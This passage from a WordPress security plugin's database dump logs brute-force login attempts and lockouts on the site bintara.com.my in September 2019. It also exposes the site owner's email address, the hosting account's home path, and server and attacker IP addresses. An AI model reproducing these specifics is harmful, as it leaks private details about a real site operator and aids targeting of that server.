attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:04:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:04:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:04:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:04:02\";s:12:\"lockout_host\";s:11:\"81.0.120.26\";}','action','2019-09-21 15:04:03','2019-09-21 15:04:02',19277504,20680016,'https://bintara.com.my/blog/wp-login.php',1,0,'81.0.120.26'),(26489,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"81.0.120.26\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:04:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:04:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:04:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:04:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:04:03','2019-09-21 15:04:02',19277432,20680016,'https://bintara.com.my/blog/wp-login.php',1,0,'81.0.120.26'),(26490,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:04:03','2019-09-21 15:04:02',19485976,20680016,'https://bintara.com.my/blog/wp-login.php',1,0,'81.0.120.26'),(26491,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY8LbfBTP0kPOVnb8jzJQAAAE0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"51682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY8LbfBTP0kPOVnb8jzJQAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078317.5699\";s:12:\"REQUEST_TIME\";s:10:\"1569078317\";}}','notice','2019-09-21 15:05:19','2019-09-21 15:05:18',19193248,20681944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.72.117'),(26492,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:05:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:05:18\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:05:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:05:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:05:19','2019-09-21 15:05:18',19277800,20681944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.72.117'),(26493,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:05:19','2019-09-21 15:05:18',19485504,20681944,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.72.117'),(26494,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY8Z3kXpgmG5P@iB8lFdAAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.236.67\";s:11:\"REMOTE_PORT\";s:5:\"54428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY8Z3kXpgmG5P@iB8lFdAAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078375.9308\";s:12:\"REQUEST_TIME\";s:10:\"1569078375\";}}','notice','2019-09-21 15:06:17','2019-09-21 15:06:16',19193976,20683096,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.236.67'),(26495,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:06:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:06:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:06:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:06:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:06:17','2019-09-21 15:06:16',19279296,20683096,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.236.67'),(26496,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:06:17','2019-09-21 15:06:16',19487480,20683096,'https://bintara.com.my/blog/wp-login.php',1,0,'108.179.236.67'),(26497,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY8aXkXpgmG5P@iB8lFdgAAAIk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"38228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY8aXkXpgmG5P@iB8lFdgAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078377.2214\";s:12:\"REQUEST_TIME\";s:10:\"1569078377\";}}','notice','2019-09-21 15:06:18','2019-09-21 15:06:17',19192112,20682008,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26498,0,'lockout','host-lockout::176.9.74.214','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"176.9.74.214\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:06:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:06:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:06:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:06:17\";s:12:\"lockout_host\";s:12:\"176.9.74.214\";}','action','2019-09-21 15:06:18','2019-09-21 15:06:17',19278320,20682008,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26499,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"176.9.74.214\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:06:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:06:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:06:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:06:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:06:18','2019-09-21 15:06:17',19278280,20682008,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26500,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:06:18','2019-09-21 15:06:17',19486600,20682008,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(26501,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY8oUnlR@6WyRVzpiDpEAAAABU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.247.210\";s:11:\"REMOTE_PORT\";s:5:\"52752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY8oUnlR@6WyRVzpiDpEAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078434.1352\";s:12:\"REQUEST_TIME\";s:10:\"1569078434\";}}','notice','2019-09-21 15:07:15','2019-09-21 15:07:14',19200536,20689872,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.247.210'),(26502,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:07:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:07:14\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:07:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:07:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:07:15','2019-09-21 15:07:14',19285424,20689872,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.247.210'),(26503,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:07:15','2019-09-21 15:07:14',19492232,20689872,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.247.210'),(26504,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY8s0nlR@6WyRVzpiDpGwAAAAA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"112.140.187.72\";s:11:\"REMOTE_PORT\";s:5:\"60005\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY8s0nlR@6WyRVzpiDpGwAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078451.1484\";s:12:\"REQUEST_TIME\";s:10:\"1569078451\";}}','notice','2019-09-21 15:07:32','2019-09-21 15:07:31',19198688,20688632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.140.187.72');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (26505,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:07:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:07:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:07:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:07:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:07:32','2019-09-21 15:07:31',19283800,20688632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.140.187.72'),(26506,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:07:32','2019-09-21 15:07:31',19492064,20688632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'112.140.187.72'),(26507,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 